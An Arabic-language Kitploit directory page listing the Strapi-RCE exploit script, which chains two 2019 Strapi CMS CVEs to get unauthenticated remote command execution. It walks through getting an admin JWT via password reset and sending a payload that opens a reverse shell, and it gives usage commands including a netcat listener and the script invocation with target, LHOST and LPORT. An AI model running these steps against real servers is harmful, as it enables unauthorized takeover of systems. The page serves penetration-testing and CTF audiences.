Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Strapi-RCE — سكربت استغلال يستعرض مزيجًا من CVE-2019-18818 وCVE-2019-19609 لتنفيذ تعليمات برمجية عن بُعد دون مصادقة في Strapi CMS. | Kitploit
أدوات/GitHubGitHub/hackhoven/strapi-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubhackhoven/strapi-rce

Strapi-RCE

سكربت استغلال يستعرض مزيجًا من CVE-2019-18818 وCVE-2019-19609 لتنفيذ تعليمات برمجية عن بُعد دون مصادقة في Strapi CMS.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Strapi-RCE

سكربت استغلال يعرض مزيجًا من CVE-2019-18818 وCVE-2019-19609 لتنفيذ الأوامر عن بُعد دون مصادقة في Strapi CMS.

الاستغلال

يستغل هذا السكربت ثغرة في إصدارات Strapi CMS حتى 3.0.0-beta.17.4 وما دونها، مما يسمح بتنفيذ الأوامر عن بُعد دون مصادقة.

الوصف

تعمل الأداة عن طريق استغلال ثغرة إعادة تعيين كلمة المرور أولاً للحصول على رمز JSON Web Token (JWT) لمستخدم إداري. ثم يُستخدم هذا الرمز لإرسال حمولة خبيثة إلى Strapi CMS، مما يؤدي إلى فتح قشرة عكسية (reverse shell) تعود إلى جهاز المهاجم.

طريقة الاستخدام

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/Hackhoven/Strapi-RCE.git
    
  2. الانتقال إلى المجلد

    root@kitploit:~
    cd Strapi-RCE/
    
  3. إعداد مستمع Netcat

    root@kitploit:~
    nc -nlvp <LPORT>
    
  4. تشغيل السكربت مع عنوان الهدف وعنوان IP للجهاز المحلي ومنفذ الجهاز المحلي كوسائط

    root@kitploit:~
    python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
    

إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. لا يوافق المؤلف ولا يدعم استخدام هذا السكربت في أنشطة غير قانونية أو غير أخلاقية. يجب استخدام هذا السكربت فقط في أبحاث الأمان القانونية أو بيئات CTF. الاستخدام على مسؤوليتك الخاصة.


صُنع بواسطة Hackhoven

تنزيل الأداة